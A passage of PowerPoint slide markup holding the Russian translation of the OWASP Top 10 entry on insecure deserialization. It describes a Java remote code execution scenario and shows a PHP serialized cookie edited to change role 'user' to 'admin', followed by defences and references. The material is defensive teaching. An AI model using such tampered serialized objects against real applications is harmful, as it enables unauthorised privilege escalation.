              <a:t> состояния пользователя и передаче его с каждым запросом. Злоумышленник, заметивший подпись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-объекта "rO0", может использовать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Serial</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Killer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> для удаленного выполнения кода на сервере приложения.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Сценарий №2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. На PHP-форуме используется </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сериализация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> PHP-объектов для хранения "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>суперкуки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>", содержащих идентификатор, роль, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>хеш</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> пароля и другие данные пользователя:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="8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sz="8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ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Злоумышленник изменяет </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сериализованный</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> объект, наделяя себя привилегиями администратора:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a:4:{i:0;i:1;i:1;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:5:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU" sz="8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1"/>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4"/>
              </a:rPr>
              <a:t>Памятка OWASP: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Десериализация</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId4"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="3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5"/>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5"/>
              </a:rPr>
              <a:t> защита OWASP: Обязательная проверка всех входных данных</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6"/>
              </a:rPr>
              <a:t>Стандарт подтверждения безопасности приложений OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"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7"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>AppSecEU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> 2016: Как пережить апокалипсис </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>десериализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU"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8"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>AppSecUSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> 2017: Пятница, 13-е — Джейсон под ударом</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="12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9"/>
              </a:rPr>
              <a:t>CWE-502: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>Десериализация</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>недоверенных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t> данных</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0"/>
              </a:rPr>
              <a:t>Безопасность </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>десериализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="90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1"/>
              </a:rPr>
              <a:t>OWASP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>AppSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>Cali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t> 2015: Консервируем объекты</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80" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Единственным безопасным решением будет отклонение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сериализованных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> объектов от </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>недоверенных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> источников или использование среды </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сериализации</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, допускающей только примитивные типы данных.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Если это невозможно, рекомендуется следующее:</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Проверка целостности </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>сериализованных</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> объектов, например, с помощью цифровых подписей, для предотвращения создания вредоносных объектов или подмены данных.</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Ввод строгих ограничений типов при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перед созданием объекта, поскольку ожидаемым является поддающийся определению набор классов. Существуют методы обхода подобной защиты, поэтому полагаться исключительно на нее не рекомендуется.</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Изоляция и запуск кода, осуществляющего </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>десериализацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, в среде с минимальными привилегиями, если это возможно.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" indent="-82800">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Журналирование</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> исключений и ошибок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например, непредусмотренных типов входных данных или исключений при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Ограничение или контроль входящих и исходящих сетевых подключений контейнеров или серверов, осуществляющих </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="780" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>десериализацию</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="78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Отслеживание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с предупреждением о фактах продолжительной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A8</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Небезопасная десериализация</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2479916285"/>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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Сложность эксплуатации: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" baseline="0">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50" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Эксплуатировать </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>десериализацию</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> сложно, поскольку готовые </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>эксплойты</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="750" b="0" i="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="24292E"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
